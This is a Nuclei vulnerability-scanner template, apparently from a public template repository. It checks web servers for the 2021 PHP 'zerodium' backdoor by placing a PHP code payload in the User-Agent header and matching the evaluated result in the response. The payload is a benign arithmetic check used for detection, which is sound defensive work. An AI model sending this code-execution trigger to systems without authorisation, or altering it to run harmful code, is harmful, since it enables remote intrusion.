nuclei-templates/vulnerabilities/other/php-zerodium-backdoor-rce.yaml

27 lines
581 B
YAML
Raw Normal View History

2021-06-10 16:31:26 +00:00
id: php-zerodium-backdoor-rce
info:
name: PHP Zerodium Backdoor RCE
author: dhiyaneshDk
2021-09-18 14:07:47 +00:00
severity: critical
description: A backdoor has been introduced into PHP, dubbed 'zerodiumvar_dump', the backdoor allowed the execution of arbitrary PHP code.
reference:
- https://news-web.php.net/php.internals/113838
2021-06-10 16:31:26 +00:00
tags: php,backdoor
requests:
- method: GET
path:
- "{{BaseURL}}"
2021-06-10 16:31:26 +00:00
headers:
User-Agent: zerodiumvar_dump(233*233);
2021-06-10 16:31:26 +00:00
matchers-condition: and
matchers:
- type: word
words:
- "int(54289)"
part: body